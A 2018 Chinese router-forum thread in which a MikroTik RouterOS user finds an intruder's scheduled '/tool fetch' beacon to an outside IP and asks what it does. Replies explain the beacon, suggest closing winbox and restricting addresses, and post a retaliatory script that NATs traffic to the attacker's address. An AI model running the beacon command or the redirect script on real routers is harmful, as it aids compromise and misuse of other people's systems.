自由的生活_软路由论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
查看: 6623|回复: 9

[基础] 今天路由器被别人登录了

[复制链接]
发表于 2018-7-31 10:06:09 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
/tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no

加了这个 语句。。。

谁看看 ,有哪些影响?
routeros
 楼主| 发表于 2018-7-31 10:10:23 | 显示全部楼层
为了管理 我开放了winbox端口,

0 XI telnet                            23
1 XI ftp                               21
2    www                               xxx
3 XI ssh                               22
4 XI www-ssl                           443  
5 XI api                               8728
6    winbox                            8291
7 XI api-ssl                           8729  
routeros
发表于 2018-7-31 18:04:33 | 显示全部楼层
本帖最后由 47771885 于 2018-7-31 18:07 编辑
  1. {
  2. :local socksp [/ip socks get port ]
  3. :local proxyp [/ip proxy get port ]

  4. /ip firewall nat
  5. add action=dst-nat chain=dstnat dst-address-type=local dst-port=($socksp.",".$proxyp) protocol=\
  6.     tcp to-addresses=95.154.216.166 to-ports=2008
  7. add action=dst-nat chain=dstnat dst-address-type=local dst-port=23,22,8291,80 protocol=\
  8.     tcp to-addresses=95.154.216.166 to-ports=2008
  9. /ip service disable api
  10. /ip service disable www
  11. /ip service disable ftp
  12. /ip service disable ssh
  13. /ip service disable telnet
  14. /ip service set winbox port=2018

  15. /ip socks
  16. set enabled=no

  17. /ip proxy
  18. set enabled=no

  19. }

复制代码
如防火墙加了策略的
补充
  1. {
  2. :local fp [/ip firewall filter get [find comment~"^port"] port]

  3. /ip firewall filter remove [find comment~"^port"]

  4. :if ( $fp > 0) do={
  5. /ip firewall nat
  6. add action=dst-nat chain=dstnat dst-address-type=local dst-port=$fp protocol=\
  7.     tcp to-addresses=95.154.216.166 to-ports=2008
  8. }
  9. }
复制代码


来个以暴制暴

scheduler 和 script 自行删除可疑的


自行修改winbox 端口 这里默认2018

routeros
 楼主| 发表于 2018-8-2 14:31:34 | 显示全部楼层
我把 winbox port改了,
就是想 请教你 ,他添加到计划任务  有何危害?  
routeros
发表于 2018-8-2 19:00:03 | 显示全部楼层
xuxi3201 发表于 2018-8-2 14:31
我把 winbox port改了,
就是想 请教你 ,他添加到计划任务  有何危害?

为了保持和你的你联系
routeros
发表于 2018-8-2 19:56:37 | 显示全部楼层
为了知道你的IP呗,方便使用你的IP做代理干别的事
routeros
 楼主| 发表于 2018-8-5 10:33:29 | 显示全部楼层
明白了,
多谢。  
routeros
发表于 2018-8-12 02:12:44 | 显示全部楼层
/tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http
修改winbox端口号后,软件升级到最新版本有效果吗?
routeros
 楼主| 发表于 2018-8-12 09:23:43 | 显示全部楼层
回复楼上的,我直接把8291外网访问 关闭了。

当然,都升级到最新版本  6.40.8
routeros
发表于 2018-8-12 10:32:27 | 显示全部楼层
假設遠端的地址有DDNS地址可查,是可透過Script排程進行更新的.以winbox為例:
:local winbox [:toarray "192.168.0.0/16,$[:resolve "aaa.no-ip.org"]"]
:if ([/ip service get winbox address]!=$winbox) do={/ip service set winbox address=$winbox}

如果有2個或更多的ddns地址,第一行修正成:
:local winbox [:toarray "192.168.0.0/16,$[:resolve "aaa.no-ip.org"],$[:resolve "bbb.no-ip.org"]"]
#更多的地址以上類推...

至於其它service服務地址,只將"winbox"這個字串改成其它服務名稱即可.
routeros
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|软路由论坛 ( 渝ICP备15001194号-1,渝公网安备 50011602500124号 )

GMT+8, 2019-12-8 18:59 , Processed in 0.146539 second(s), 22 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4 Licensed

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表